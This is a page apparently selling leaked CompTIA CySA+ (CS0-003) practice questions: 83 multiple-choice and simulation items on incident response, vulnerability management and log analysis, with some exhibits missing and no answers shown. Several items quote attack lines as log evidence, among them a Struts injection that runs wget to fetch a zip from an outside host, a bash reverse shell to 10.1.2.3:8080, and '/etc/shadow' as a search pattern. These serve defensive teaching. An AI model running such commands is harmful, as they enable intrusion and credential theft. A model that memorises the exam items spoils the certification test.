Pre-Winter Special Discount 60% Offer - Ends in 0d 00h 00m 00s - Coupon code: brite60

ExamsBrite Dumps

CompTIA CyberSecurity Analyst CySA+ Certification Exam Question and Answers

CompTIA CyberSecurity Analyst CySA+ Certification Exam

Last Update Oct 9, 2024
Total Questions : 327

We are offering FREE CS0-003 CompTIA exam questions. All you do is to just go and sign up. Give your details, prepare CS0-003 free exam questions and then go for complete pool of CompTIA CyberSecurity Analyst CySA+ Certification Exam test questions that will help you more.

CS0-003 pdf

CS0-003 PDF

$40  $99.99
CS0-003 Engine

CS0-003 Testing Engine

$48  $119.99
CS0-003 PDF + Engine

CS0-003 PDF + Testing Engine

$64  $159.99
Questions 1

Which of the following threat-modeling procedures is in the OWASP Web Security Testing Guide?

Options:

A.  

Review Of security requirements

B.  

Compliance checks

C.  

Decomposing the application

D.  

Security by design

Discussion 0
Questions 2

Which of the following would help to minimize human engagement and aid in process improvement in security operations?

Options:

A.  

OSSTMM

B.  

SIEM

C.  

SOAR

D.  

QVVASP

Discussion 0
Questions 3

A security analyst discovers an ongoing ransomware attack while investigating a phishing email. The analyst downloads a copy of the file from the email and isolates the affected workstation from the network. Which of the following activities should the analyst perform next?

Options:

A.  

Wipe the computer and reinstall software

B.  

Shut down the email server and quarantine it from the network.

C.  

Acquire a bit-level image of the affected workstation.

D.  

Search for other mail users who have received the same file.

Discussion 0
Questions 4

While a security analyst for an organization was reviewing logs from web servers. the analyst found several successful attempts to downgrade HTTPS sessions to use cipher modes of operation susceptible to padding oracle attacks. Which of the following combinations of configuration changes should the organization make to remediate this issue? (Select two).

Options:

A.  

Configure the server to prefer TLS 1.3.

B.  

Remove cipher suites that use CBC.

C.  

Configure the server to prefer ephemeral modes for key exchange.

D.  

Require client browsers to present a user certificate for mutual authentication.

E.  

Configure the server to require HSTS.

F.  

Remove cipher suites that use GCM.

Discussion 0
Questions 5

An attacker recently gained unauthorized access to a financial institution's database, which contains confidential information. The attacker exfiltrated a large amount of data before being detected and blocked. A security analyst needs to complete a root cause analysis to determine how the attacker was able to gain access. Which of the following should the analyst perform first?

Options:

A.  

Document the incident and any findings related to the attack for future reference.

B.  

Interview employees responsible for managing the affected systems.

C.  

Review the log files that record all events related to client applications and user access.

D.  

Identify the immediate actions that need to be taken to contain the incident and minimize damage.

Discussion 0
Questions 6

A Chief Information Security Officer (CISO) wants to disable a functionality on a business-critical web application that is vulnerable to RCE in order to maintain the minimum risk level with minimal increased cost.

Which of the following risk treatments best describes what the CISO is looking for?

Options:

A.  

Transfer

B.  

Mitigate

C.  

Accept

D.  

Avoid

Discussion 0
Questions 7

After completing a review of network activity. the threat hunting team discovers a device on the network that sends an outbound email via a mail client to a non-company email address daily

at 10:00 p.m. Which of the following is potentially occurring?

Options:

A.  

Irregular peer-to-peer communication

B.  

Rogue device on the network

C.  

Abnormal OS process behavior

D.  

Data exfiltration

Discussion 0
Questions 8

An employee is no longer able to log in to an account after updating a browser. The employee usually has several tabs open in the browser. Which of

the following attacks was most likely performed?

Options:

A.  

RFI

B.  

LFI

C.  

CSRF

D.  

XSS

Discussion 0
Questions 9

Which Of the following techniques would be best to provide the necessary assurance for embedded software that drives centrifugal pumps at a power Plant?

Options:

A.  

Containerization

B.  

Manual code reviews

C.  

Static and dynamic analysis

D.  

Formal methods

Discussion 0
Questions 10

A company brings in a consultant to make improvements to its website. After the consultant leaves. a web developer notices unusual activity on the website and submits a suspicious file containing the following code to the security team:

Which of the following did the consultant do?

Options:

A.  

Implanted a backdoor

B.  

Implemented privilege escalation

C.  

Implemented clickjacking

D.  

Patched the web server

Discussion 0
Questions 11

A security analyst is performing an investigation involving multiple targeted Windows malware binaries. The analyst wants to gather intelligence without disclosing information to the attackers. Which of the following actions would allow the analyst to achieve the objective?

Options:

A.  

Upload the binary to an air-gapped sandbox for analysis.

B.  

Send the binaries to the antivirus vendor.

C.  

Execute the binaries on an environment with internet connectivity.

D.  

Query the file hashes using VirusTotal.

Discussion 0
Questions 12

Which of the following is the best action to take after the conclusion of a security incident to improve incident response in the future?

Options:

A.  

Develop a call tree to inform impacted users

B.  

Schedule a review with all teams to discuss what occurred

C.  

Create an executive summary to update company leadership

D.  

Review regulatory compliance with public relations for official notification

Discussion 0
Questions 13

A security analyst is reviewing the findings of the latest vulnerability report for a company's web application. The web application accepts files for a Bash script to be processed if the files match a given hash. The analyst is able to submit files to the system due to a hash collision. Which of the following should the analyst suggest to mitigate the vulnerability with the fewest changes to the current script and infrastructure?

Options:

A.  

Deploy a WAF to the front of the application.

B.  

Replace the current MD5 with SHA-256.

C.  

Deploy an antivirus application on the hosting system.

D.  

Replace the MD5 with digital signatures.

Discussion 0
Questions 14

Several vulnerability scan reports have indicated runtime errors as the code is executing. The dashboard that lists the errors has a command-line interface for developers to check for vulnerabilities. Which of the following will enable a developer to correct this issue? (Select two).

Options:

A.  

Performing dynamic application security testing

B.  

Reviewing the code

C.  

Fuzzing the application

D.  

Debugging the code

E.  

Implementing a coding standard

F.  

Implementing IDS

Discussion 0
Questions 15

Which of the following does "federation" most likely refer to within the context of identity and access management?

Options:

A.  

Facilitating groups of users in a similar function or profile to system access that requires elevated or conditional access

B.  

An authentication mechanism that allows a user to utilize one set of credentials to access multiple domains

C.  

Utilizing a combination of what you know, who you are, and what you have to grant authentication to a user

D.  

Correlating one's identity with the attributes and associated applications the user has access to

Discussion 0
Questions 16

A security analyst is responding to an indent that involves a malicious attack on a network. Data closet. Which of the following best explains how are analyst should properly document the incident?

Options:

A.  

Back up the configuration file for alt network devices

B.  

Record and validate each connection

C.  

Create a full diagram of the network infrastructure

D.  

Take photos of the impacted items

Discussion 0
Questions 17

Using open-source intelligence gathered from technical forums, a threat actor compiles and tests a malicious downloader to ensure it will not be detected by the victim organization's endpoint security protections. Which of the following stages of the Cyber Kill Chain best aligns with the threat actor's actions?

Options:

A.  

Delivery

B.  

Reconnaissance

C.  

Exploitation

D.  

Weaponizatign

Discussion 0
Questions 18

Which of the following items should be included in a vulnerability scan report? (Choose two.)

Options:

A.  

Lessons learned

B.  

Service-level agreement

C.  

Playbook

D.  

Affected hosts

E.  

Risk score

F.  

Education plan

Discussion 0
Questions 19

A company's security team is updating a section of the reporting policy that pertains to inappropriate use of resources (e.g., an employee who installs cryptominers on workstations in the office). Besides the security team, which

of the following groups should the issue be escalated to first in order to comply with industry best practices?

Options:

A.  

Help desk

B.  

Law enforcement

C.  

Legal department

D.  

Board member

Discussion 0
Questions 20

Approximately 100 employees at your company have received a Phishing email. AS a security analyst. you have been tasked with handling this Situation.

Review the information provided and determine the following:

1. HOW many employees Clicked on the link in the Phishing email?

2. on how many workstations was the malware installed?

3. what is the executable file name of the malware?

Options:

Discussion 0
Questions 21

A cybersecurity analyst is recording the following details

* ID

* Name

* Description

* Classification of information

* Responsible party

In which of the following documents is the analyst recording this information?

Options:

A.  

Risk register

B.  

Change control documentation

C.  

Incident response playbook

D.  

Incident response plan

Discussion 0
Questions 22

An analyst views the following log entries:

The organization has a partner vendor with hosts in the 216.122.5.x range. This partner vendor is required to have access to monthly reports and is the only external vendor with authorized access. The organization prioritizes incident investigation according to the following hierarchy: unauthorized data disclosure is more critical than denial of service attempts.

which are more important than ensuring vendor data access.

Based on the log files and the organization's priorities, which of the following hosts warrants additional investigation?

Options:

A.  

121.19.30.221

B.  

134.17.188.5

C.  

202.180.1582

D.  

216.122.5.5

Discussion 0
Questions 23

Which of the following entities should an incident manager work with to ensure correct processes are adhered to when communicating incident reporting to the general public, as a best practice? (Select two).

Options:

A.  

Law enforcement

B.  

Governance

C.  

Legal

D.  

Manager

E.  

Public relations

F.  

Human resources

Discussion 0
Questions 24

A malicious actor has gained access to an internal network by means of social engineering. The actor does not want to lose access in order to continue the attack. Which of the following best describes the current stage of the Cyber Kill Chain that the threat actor is currently operating in?

Options:

A.  

Weaponization

B.  

Reconnaissance

C.  

Delivery

D.  

Exploitation

Discussion 0
Questions 25

A security analyst is performing an investigation involving multiple targeted Windows malware binaries. The analyst wants to gather intelligence without disclosing information to the attackers. Which of the following actions would allow the analyst to achieve the objective?

Options:

A.  

Upload the binary to an air gapped sandbox for analysis

B.  

Send the binaries to the antivirus vendor

C.  

Execute the binaries on an environment with internet connectivity

D.  

Query the file hashes using VirusTotal

Discussion 0
Questions 26

During an incident, a security analyst discovers a large amount of Pll has been emailed externally from an employee to a public email address. The analyst finds that the external email is the employee's

personal email. Which of the following should the analyst recommend be done first?

Options:

A.  

Place a legal hold on the employee's mailbox.

B.  

Enable filtering on the web proxy.

C.  

Disable the public email access with CASB.

D.  

Configure a deny rule on the firewall.

Discussion 0
Questions 27

Which of the following best describes the goal of a tabletop exercise?

Options:

A.  

To test possible incident scenarios and how to react properly

B.  

To perform attack exercises to check response effectiveness

C.  

To understand existing threat actors and how to replicate their techniques

D.  

To check the effectiveness of the business continuity plan

Discussion 0
Questions 28

Which of the following best describes the goal of a disaster recovery exercise as preparation for possible incidents?

Options:

A.  

TO provide metrics and test continuity controls

B.  

To verify the roles of the incident response team

C.  

To provide recommendations for handling vulnerabilities

D.  

To perform tests against implemented security controls

Discussion 0
Questions 29

Which of the following concepts is using an API to insert bulk access requests from a file into an identity management system an example of?

Options:

A.  

Command and control

B.  

Data enrichment

C.  

Automation

D.  

Single sign-on

Discussion 0
Questions 30

A manufacturer has hired a third-party consultant to assess the security of an OT network that includes both fragile and legacy equipment Which of the following must be considered to ensure the consultant does no harm to operations?

Options:

A.  

Employing Nmap Scripting Engine scanning techniques

B.  

Preserving the state of PLC ladder logic prior to scanning

C.  

Using passive instead of active vulnerability scans

D.  

Running scans during off-peak manufacturing hours

Discussion 0
Questions 31

A security analyst noticed the following entry on a web server log:

Warning: fopen (http://127.0.0.1:16) : failed to open stream:

Connection refused in /hj/var/www/showimage.php on line 7

Which of the following malicious activities was most likely attempted?

Options:

A.  

XSS

B.  

CSRF

C.  

SSRF

D.  

RCE

Discussion 0
Questions 32

A security alert was triggered when an end user tried to access a website that is not allowed per organizational policy. Since the action is considered a terminable offense, the SOC analyst collects the authentication logs, web logs, and temporary files, reflecting the web searches from the user's workstation, to build the case for the investigation. Which of the following is the best way to ensure that the investigation complies with HR or privacy policies?

Options:

A.  

Create a timeline of events detailinq the date stamps, user account hostname and IP information associated with the activities

B.  

Ensure that the case details do not reflect any user-identifiable information Password protect the evidence and restrict access to personnel related to the investigation

C.  

Create a code name for the investigation in the ticketing system so that all personnel with access will not be able to easily identity the case as an HR-related investigation

D.  

Notify the SOC manager for awareness after confirmation that the activity was intentional

Discussion 0
Questions 33

During a security test, a security analyst found a critical application with a buffer overflow vulnerability. Which of the following would be best to mitigate the vulnerability at the application level?

Options:

A.  

Perform OS hardening.

B.  

Implement input validation.

C.  

Update third-party dependencies.

D.  

Configure address space layout randomization.

Discussion 0
Questions 34

Several reports with sensitive information are being disclosed via file sharing services. The company would like to improve its security posture against this threat. Which of the following security controls would best support the company in this scenario?

Options:

A.  

Implement step-up authentication for administrators.

B.  

Improve employee training and awareness.

C.  

Increase password complexity standards.

D.  

Deploy mobile device management.

Discussion 0
Questions 35

A cybersecurity analyst is doing triage in a SIEM and notices that the time stamps between the firewall and the host under investigation are off by 43 minutes. Which of the following is the most likely scenario occurring with the time stamps?

Options:

A.  

The NTP server is not configured on the host.

B.  

The cybersecurity analyst is looking at the wrong information.

C.  

The firewall is using UTC time.

D.  

The host with the logs is offline.

Discussion 0
Questions 36

A development team is preparing to roll out a beta version of a web application and wants to quickly test for vulnerabilities, including SQL injection, path traversal, and cross-site scripting. Which of the following tools would the security team most likely recommend to perform this test?

Options:

A.  

Has heat

B.  

OpenVAS

C.  

OWASP ZAP

D.  

Nmap

Discussion 0
Questions 37

A healthcare organization must develop an action plan based on the findings from a risk

assessment. The action plan must consist of:

· Risk categorization

· Risk prioritization

. Implementation of controls

INSTRUCTIONS

Click on the audit report, risk matrix, and SLA expectations documents to review their

contents.

On the Risk categorization tab, determine the order in which the findings must be

prioritized for remediation according to the risk rating score. Then, assign a categorization to each risk.

On the Controls tab, select the appropriate control(s) to implement for each risk finding.

Findings may have more than one control implemented. Some controls may be used

more than once or not at all.

If at any time you would like to bring back the initial state of the simulation, please click

the Reset All button.

Options:

Discussion 0
Questions 38

A security analyst is trying to detect connections to a suspicious IP address by collecting the packet captures from the gateway. Which of the following commands should the security analyst consider running?

Options:

A.  

grep [IP address] packets.pcap

B cat packets.pcap | grep [IP Address]

B.  

tcpdump -n -r packets.pcap host [IP address]

C.  

strings packets.pcap | grep [IP Address]

Discussion 0
Questions 39

Which of the following techniques can help a SOC team to reduce the number of alerts related to the internal security activities that the analysts have to triage?

Options:

A.  

Enrich the SIEM-ingested data to include all data required for triage.

B.  

Schedule a task to disable alerting when vulnerability scans are executing.

C.  

Filter all alarms in the SIEM with low severity.

D.  

Add a SOAR rule to drop irrelevant and duplicated notifications.

Discussion 0
Questions 40

During an incident, some loCs of possible ransomware contamination were found in a group of servers in a segment of the network. Which of the following steps should be taken next?

Options:

A.  

Isolation

B.  

Remediation

C.  

Reimaging

D.  

Preservation

Discussion 0
Questions 41

An organization conducted a web application vulnerability assessment against the corporate website, and the following output was observed:

Which of the following tuning recommendations should the security analyst share?

Options:

A.  

Set an HttpOnlvflaq to force communication by HTTPS

B.  

Block requests without an X-Frame-Options header

C.  

Configure an Access-Control-Allow-Origin header to authorized domains

D.  

Disable the cross-origin resource sharing header

Discussion 0
Questions 42

A security analyst received an alert regarding multiple successful MFA log-ins for a particular user When reviewing the authentication logs the analyst sees the following:

Which of the following are most likely occurring, based on the MFA logs? (Select two).

Options:

A.  

Dictionary attack

B.  

Push phishing

C.  

impossible geo-velocity

D.  

Subscriber identity module swapping

E.  

Rogue access point

F.  

Password spray

Discussion 0
Questions 43

A cybersecurity team lead is developing metrics to present in the weekly executive briefs. Executives are interested in knowing how long it takes to stop the spread of malware that enters the network.

Which of the following metrics should the team lead include in the briefs?

Options:

A.  

Mean time between failures

B.  

Mean time to detect

C.  

Mean time to remediate

D.  

Mean time to contain

Discussion 0
Questions 44

A security analyst reviews the latest vulnerability scans and observes there are vulnerabilities with similar CVSSv3 scores but different base score metrics. Which of the following attack vectors should the analyst remediate first?

Options:

A.  

CVSS 3.0/AVP/AC:L/PR:L/UI:N/S U/C:H/I:H/A:H

B.  

CVSS 3.0/AV:A/AC .L/PR:L/UI:N/S:U/C:H/I:H/A:H

C.  

CVSS 3.0/AV:N/AC:L/PR:L/UI:N/S;U/C:H/I:H/A:H

D.  

CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Discussion 0
Questions 45

Which of the following is the most likely reason for an organization to assign different internal departmental groups during the post-incident analysis and improvement process?

Options:

A.  

To expose flaws in the incident management process related to specific work areas

B.  

To ensure all staff members get exposure to the review process and can provide feedback

C.  

To verify that the organization playbook was properly followed throughout the incident

D.  

To allow cross-training for staff who are not involved in the incident response process

Discussion 0
Questions 46

An incident response team member is triaging a Linux server. The output is shown below:

$ cat /etc/passwd

root:x:0:0::/:/bin/zsh

bin:x:1:1::/:/usr/bin/nologin

daemon:x:2:2::/:/usr/bin/nologin

mail:x:8:12::/var/spool/mail:/usr/bin/nologin

http:x:33:33::/srv/http:/bin/bash

nobody:x:65534:65534:Nobody:/:/usr/bin/nologin

git:x:972:972:git daemon user:/:/usr/bin/git-shell

$ cat /var/log/httpd

at org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:241)

at org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:208)

at org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:316)

at org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)

WARN [struts2.dispatcher.multipart.JakartaMultipartRequest] Unable to parse request container.getlnstance.(#wget http://grohl.ve.da/tmp/brkgtr.zip;#whoami)

at org.apache.commons.fileupload.FileUploadBase$FileUploadBase$FileItemIteratorImpl.(FileUploadBase.java:947) at org.apache.commons.fileupload.FileUploadBase.getItemiterator(FileUploadBase.java:334)

at org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest(JakartaMultiPartRequest.java:188) org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest(JakartaMultipartRequest.java:423)

Which of the following is the adversary most likely trying to do?

Options:

A.  

Create a backdoor root account named zsh.

B.  

Execute commands through an unsecured service account.

C.  

Send a beacon to a command-and-control server.

D.  

Perform a denial-of-service attack on the web server.

Discussion 0
Questions 47

An organization recently changed its BC and DR plans. Which of the following would best allow for the incident response team to test the changes without any impact to the business?

Options:

A.  

Perform a tabletop drill based on previously identified incident scenarios.

B.  

Simulate an incident by shutting down power to the primary data center.

C.  

Migrate active workloads from the primary data center to the secondary location.

D.  

Compare the current plan to lessons learned from previous incidents.

Discussion 0
Questions 48

A security analyst is assisting a software engineer with the development of a custom log collection and alerting tool (SIEM) for a proprietary system. The analyst is concerned that the tool will not detect known attacks and behavioral loCs. Which of the following should be configured in order to resolve this issue?

Options:

A.  

Randomly generate and store all possible file hash values.

B.  

Create a default rule to alert on any change to the system.

C.  

Integrate with an open-source threat intelligence feed.

D.  

Manually add known threat signatures into the tool.

Discussion 0
Questions 49

The vulnerability analyst reviews threat intelligence regarding emerging vulnerabilities affecting workstations that are used within the company:

Which of the following vulnerabilities should the analyst be most concerned about, knowing that end users frequently click on malicious links sent via email?

Options:

A.  

Vulnerability A

B.  

Vulnerability B

C.  

Vulnerability C

D.  

Vulnerability D

Discussion 0
Questions 50

Which of the following describes how a CSIRT lead determines who should be communicated with and when during a security incident?

Options:

A.  

The lead should review what is documented in the incident response policy or plan

B.  

Management level members of the CSIRT should make that decision

C.  

The lead has the authority to decide who to communicate with at any time

D.  

Subject matter experts on the team should communicate with others within the specified area of expertise

Discussion 0
Questions 51

A security analyst discovers an LFI vulnerability that can be exploited to extract credentials from the underlying host. Which of the following patterns can the security analyst use to search the web server

logs for evidence of exploitation of that particular vulnerability?

Options:

A.  

/etc/ shadow

B.  

curl localhost

C.  

; printenv

D.  

cat /proc/self/

Discussion 0
Questions 52

A company has the following security requirements:

. No public IPs

· All data secured at rest

. No insecure ports/protocols

After a cloud scan is completed, a security analyst receives reports that several misconfigurations are putting the company at risk. Given the following cloud scanner output:

Which of the following should the analyst recommend be updated first to meet the security requirements and reduce risks?

Options:

A.  

VM_PRD_DB

B.  

VM_DEV_DB

C.  

VM_DEV_Web02

D.  

VM_PRD_Web01

Discussion 0
Questions 53

A security analyst performs various types of vulnerability scans. Review the vulnerability scan results to determine the type of scan that was executed and if a false positive occurred for each device.

Instructions:

Select the Results Generated drop-down option to determine if the results were generated from a credentialed scan, non-credentialed scan, or a compliance scan.

For ONLY the credentialed and non-credentialed scans, evaluate the results for false positives and check the findings that display false positives. NOTE: If you would like to uncheck an option that is currently selected, click on the option a second time.

Lastly, based on the vulnerability scan results, identify the type of Server by dragging the Server to the results.

The Linux Web Server, File-Print Server and Directory Server are draggable.

If at any time you would like to bring back the initial state of the simulation, please select the Reset All button. When you have completed the simulation, please select the Done button to submit. Once the simulation is submitted, please select the Next button to continue.

Options:

Discussion 0
Questions 54

Following a recent security incident, the Chief Information Security Officer is concerned with improving visibility and reporting of malicious actors in the environment. The goal is to reduce the time to prevent lateral movement and potential data exfiltration. Which of the following techniques will best achieve the improvement?

Options:

A.  

Mean time to detect

B.  

Mean time to respond

C.  

Mean time to remediate

D.  

Service-level agreement uptime

Discussion 0
Questions 55

A security analyst needs to ensure that systems across the organization are protected based on the sensitivity of the content each system hosts. The analyst is working with the respective system

owners to help determine the best methodology that seeks to promote confidentiality, availability, and integrity of the data being hosted. Which of the following should the security analyst perform first to

categorize and prioritize the respective systems?

Options:

A.  

Interview the users who access these systems,

B.  

Scan the systems to see which vulnerabilities currently exist.

C.  

Configure alerts for vendor-specific zero-day exploits.

D.  

Determine the asset value of each system.

Discussion 0
Questions 56

During normal security monitoring activities, the following activity was observed:

cd C:\Users\Documents\HR\Employees

takeown/f .*

SUCCESS:

Which of the following best describes the potentially malicious activity observed?

Options:

A.  

Registry changes or anomalies

B.  

Data exfiltration

C.  

Unauthorized privileges

D.  

File configuration changes

Discussion 0
Questions 57

A virtual web server in a server pool was infected with malware after an analyst used the internet to research a system issue. After the server was rebuilt and added back into the server pool, users reported issues with the website, indicating the site could not be trusted. Which of the following is the most likely cause of the server issue?

Options:

A.  

The server was configured to use SSI- to securely transmit data

B.  

The server was supporting weak TLS protocols for client connections.

C.  

The malware infected all the web servers in the pool.

D.  

The digital certificate on the web server was self-signed

Discussion 0
Questions 58

A security analyst observed the following activity from a privileged account:

. Accessing emails and sensitive information

. Audit logs being modified

. Abnormal log-in times

Which of the following best describes the observed activity?

Options:

A.  

Irregular peer-to-peer communication

B.  

Unauthorized privileges

C.  

Rogue devices on the network

D.  

Insider attack

Discussion 0
Questions 59

An analyst has been asked to validate the potential risk of a new ransomware campaign that the Chief Financial Officer read about in the newspaper. The company is a manufacturer of a very small spring used in the newest fighter jet and is a critical piece of the supply chain for this aircraft. Which of the following would be the best threat intelligence source to learn about this new campaign?

Options:

A.  

Information sharing organization

B.  

Blogs/forums

C.  

Cybersecuritv incident response team

D.  

Deep/dark web

Discussion 0
Questions 60

A systems analyst is limiting user access to system configuration keys and values in a Windows environment. Which of the following describes where the analyst can find these configuration items?

Options:

A.  

config. ini

B.  

ntds.dit

C.  

Master boot record

D.  

Registry

Discussion 0
Questions 61

Which of the following best describes the key goal of the containment stage of an incident response process?

Options:

A.  

To limit further damage from occurring

B.  

To get services back up and running

C.  

To communicate goals and objectives of theincidentresponse plan

D.  

To prevent data follow-on actions by adversary exfiltration

Discussion 0
Questions 62

A vulnerability management team is unable to patch all vulnerabilities found during their weekly scans. Using the third-party scoring system described below, the team patches the most urgent vulnerabilities:

Additionally, the vulnerability management team feels that the metrics Smear and Channing are less important than the others, so these will be lower in priority. Which of the following vulnerabilities should be patched first, given the above third-party scoring system?

Options:

A.  

InLoud:

Cobain: Yes

Grohl: No

Novo: Yes

Smear: Yes

Channing: No

B.  

TSpirit:

Cobain: Yes

Grohl: Yes

Novo: Yes

Smear: No

Channing: No

C.  

ENameless:

Cobain: Yes

Grohl: No

Novo: Yes

Smear: No

Channing: No

D.  

PBleach:

Cobain: Yes

Grohl: No

Novo: No

Smear: No

Channing: Yes

Discussion 0
Questions 63

A security analyst is reviewing the logs of a web server and notices that an attacker has attempted to exploit a SQL injection vulnerability. Which of the following tools can the analyst use to analyze the attack and prevent future attacks?

Options:

A.  

A web application firewall

B.  

A network intrusion detection system

C.  

A vulnerability scanner

D.  

A web proxy

Discussion 0
Questions 64

A cybersecurity analyst has recovered a recently compromised server to its previous state. Which of the following should the analyst perform next?

Options:

A.  

Eradication

B.  

Isolation

C.  

Reporting

D.  

Forensic analysis

Discussion 0
Questions 65

An incident responder was able to recover a binary file through the network traffic. The binary file was also found in some machines with anomalous behavior. Which of the following processes most likely can be performed to understand the purpose of the binary file?

Options:

A.  

File debugging

B.  

Traffic analysis

C.  

Reverse engineering

D.  

Machine isolation

Discussion 0
Questions 66

Each time a vulnerability assessment team shares the regular report with other teams, inconsistencies regarding versions and patches in the existing infrastructure are discovered. Which of the following is the best solution to decrease the inconsistencies?

Options:

A.  

Implementing credentialed scanning

B.  

Changing from a passive to an active scanning approach

C.  

Implementing a central place to manage IT assets

D.  

Performing agentless scanning

Discussion 0
Questions 67

The Chief Executive Officer of an organization recently heard that exploitation of new attacks in the industry was happening approximately 45 days after a patch was released. Which of the following would best protect this organization?

Options:

A.  

A mean time to remediate of 30 days

B.  

A mean time to detect of 45 days

C.  

A mean time to respond of 15 days

D.  

Third-party application testing

Discussion 0
Questions 68

While reviewing web server logs, an analyst notices several entries with the same time stamps, but all contain odd characters in the request line. Which of the following steps should be taken next?

Options:

A.  

Shut the network down immediately and call the next person in the chain of command.

B.  

Determine what attack the odd characters are indicative of

C.  

Utilize the correct attack framework and determine what the incident response will consist of.

D.  

Notify the local law enforcement for incident response

Discussion 0
Questions 69

An organization has established a formal change management process after experiencing several critical system failures over the past year. Which of the following are key factors that the change management process will include in order to reduce the impact of system failures? (Select two).

Options:

A.  

Ensure users the document system recovery plan prior to deployment.

B.  

Perform a full system-level backup following the change.

C.  

Leverage an audit tool to identify changes that are being made.

D.  

Identify assets with dependence that could be impacted by the change.

E.  

Require diagrams to be completed for all critical systems.

F.  

Ensure that all assets are properly listed in the inventory management system.

Discussion 0
Questions 70

You are a penetration tester who is reviewing the system hardening guidelines for a company. Hardening guidelines indicate the following.

    There must be one primary server or service per device.

    Only default port should be used

    Non- secure protocols should be disabled.

    The corporate internet presence should be placed in a protected subnet

Instructions :

    Using the available tools, discover devices on the corporate network and the services running on these devices.

You must determine

    ip address of each device

    The primary server or service each device

    The protocols that should be disabled based on the hardening guidelines

Options:

Discussion 0
Questions 71

The SOC received a threat intelligence notification indicating that an employee's credentials were found on the dark web. The user's web and log-in activities were reviewed for malicious or anomalous connections, data uploads/downloads, and exploits. A review of the controls confirmed multifactor

authentication was enabled. Which of the following should be done first to mitigate impact to the business networks and assets?

Options:

A.  

Perform a forced password reset.

B.  

Communicate the compromised credentials to the user.

C.  

Perform an ad hoc AV scan on the user's laptop.

D.  

Review and ensure privileges assigned to the user's account reflect least privilege.

E.  

Lower the thresholds for SOC alerting of suspected malicious activity.

Discussion 0
Questions 72

An analyst needs to provide recommendations based on a recent vulnerability scan:

Which of the following should the analyst recommend addressing to ensure potential vulnerabilities are identified?

Options:

A.  

SMB use domain SID to enumerate users

B.  

SYN scanner

C.  

SSL certificate cannot be trusted

D.  

Scan not performed with admin privileges

Discussion 0
Questions 73

After identifying a threat, a company has decided to implement a patch management program to remediate vulnerabilities. Which of the following risk management principles is the company exercising?

Options:

A.  

Transfer

B.  

Accept

C.  

Mitigate

D.  

Avoid

Discussion 0
Questions 74

A security analyst is reviewing events that occurred during a possible compromise. The analyst obtains the following log:

Which of the following is most likely occurring, based on the events in the log?

Options:

A.  

An adversary is attempting to find the shortest path of compromise.

B.  

An adversary is performing a vulnerability scan.

C.  

An adversary is escalating privileges.

D.  

An adversary is performing a password stuffing attack.

.

Discussion 0
Questions 75

A cybersecurity analyst notices unusual network scanning activity coming from a country that the company does not do business with. Which of the following is the best mitigation technique?

Options:

A.  

Geoblock the offending source country

B.  

Block the IP range of the scans at the network firewall.

C.  

Perform a historical trend analysis and look for similar scanning activity.

D.  

Block the specific IP address of the scans at the network firewall

Discussion 0
Questions 76

A security analyst identified the following suspicious entry on the host-based IDS logs:

bash -i >& /dev/tcp/10.1.2.3/8080 0>&1

Which of the following shell scripts should the analyst use to most accurately confirm if the activity is ongoing?

Options:

A.  

#!/bin/bash

nc 10.1.2.3 8080 -vv >dev/null && echo "Malicious activity" Il echo "OK"

B.  

#!/bin/bash

ps -fea | grep 8080 >dev/null && echo "Malicious activity" I| echo "OK"

C.  

#!/bin/bash

ls /opt/tcp/10.1.2.3/8080 >dev/null && echo "Malicious activity" I| echo "OK"

D.  

#!/bin/bash

netstat -antp Igrep 8080 >dev/null && echo "Malicious activity" I| echo "OK"

Discussion 0
Questions 77

Which of the following is a benefit of the Diamond Model of Intrusion Analysis?

Options:

A.  

It provides analytical pivoting and identifies knowledge gaps.

B.  

It guarantees that the discovered vulnerability will not be exploited again in the future.

C.  

It provides concise evidence that can be used in court

D.  

It allows for proactive detection and analysis of attack events

Discussion 0
Questions 78

A security analyst has received an incident case regarding malware spreading out of control on a customer's network. The analyst is unsure how to respond. The configured EDR has automatically obtained a sample of the malware and its signature. Which of the following should the analyst perform next to determine the type of malware, based on its telemetry?

Options:

A.  

Cross-reference the signature with open-source threat intelligence.

B.  

Configure the EDR to perform a full scan.

C.  

Transfer the malware to a sandbox environment.

D.  

Log in to the affected systems and run necstat.

Discussion 0
Questions 79

Security analysts review logs on multiple servers on a daily basis. Which of the following implementations will give the best central visibility into the events occurring throughout the corporate environment without logging in to the servers individually?

Options:

A.  

Deploy a database to aggregate the logging.

B.  

Configure the servers to forward logs to a SIEM-

C.  

Share the log directory on each server to allow local access,

D.  

Automate the emailing of logs to the analysts.

Discussion 0
Questions 80

A company recently removed administrator rights from all of its end user workstations. An analyst uses CVSSv3.1 exploitability metrics to prioritize the vulnerabilities for the workstations and produces the following information:

Which of the following vulnerabilities should be prioritized for remediation?

Options:

A.  

nessie.explosion

B.  

vote.4p

C.  

sweet.bike

D.  

great.skills

Discussion 0
Questions 81

A security analyst receives an alert for suspicious activity on a company laptop An excerpt of the log is shown below:

Which of the following has most likely occurred?

Options:

A.  

An Office document with a malicious macro was opened.

B.  

A credential-stealing website was visited.

C.  

A phishing link in an email was clicked

D.  

A web browser vulnerability was exploited.

Discussion 0
Questions 82

An organization has noticed large amounts of data are being sent out of its network. An

analyst is identifying the cause of the data exfiltration.

INSTRUCTIONS

Select the command that generated the output in tabs 1 and 2.

Review the output text in all tabs and identify the file responsible for the malicious

behavior.

If at any time you would like to bring back the initial state of the simulation, please click

the Reset All button.

Options:

Discussion 0
Questions 83

A security analyst is trying to identify anomalies on the network routing. Which of the following functions can the analyst use on a shell script to achieve the objective most accurately?

Options:

A.  

function x() { info=$(geoiplookup $1) && echo "$1 | $info" }

B.  

function x() { info=$(ping -c 1 $1 | awk -F "/" ’END{print $5}’) && echo "$1 | $info" }

C.  

function x() { info=$(dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ".in-addr" ’{print $1} ').origin.asn.cymru.com TXT +short) && echo "$1 | $info" }

D.  

function x() { info=$(traceroute -m 40 $1 | awk ‘END{print $1}’) && echo "$1 | $info" }

Discussion 0
Questions 84

